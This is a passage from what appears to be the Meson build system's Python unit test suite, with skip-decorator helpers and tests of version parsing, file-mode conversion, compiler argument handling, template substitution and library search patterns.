return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(cc, ['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(cc, ['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
self.assertEqual([1], listify(holder1, unholder=True))
self.assertEqual([1], listify([holder1], unholder=True))
self.assertEqual([1, 2], listify([holder1, 2], unholder=True))
self.assertEqual([1, 2, 3], listify([holder1, 2, [holder3]], unholder=True))
# Unholding doesn't work recursively when not flattening
self.assertEqual([1, [2], [holder3]], listify([holder1, [2], [holder3]], unholder=True, flatten=False))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True))
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True, pop=True))
self.assertEqual(kwargs, {})
# Test listification
kwargs = {'sources': [1, 2, 3], 'pch_sources': [4, 5, 6]}
self.assertEqual([[1, 2, 3], [4, 5, 6]], extract(kwargs, 'sources', 'pch_sources'))
def test_pkgconfig_module(self):
class Mock:
pass
dummystate = Mock()
dummystate.subproject = 'dummy'
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c_link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
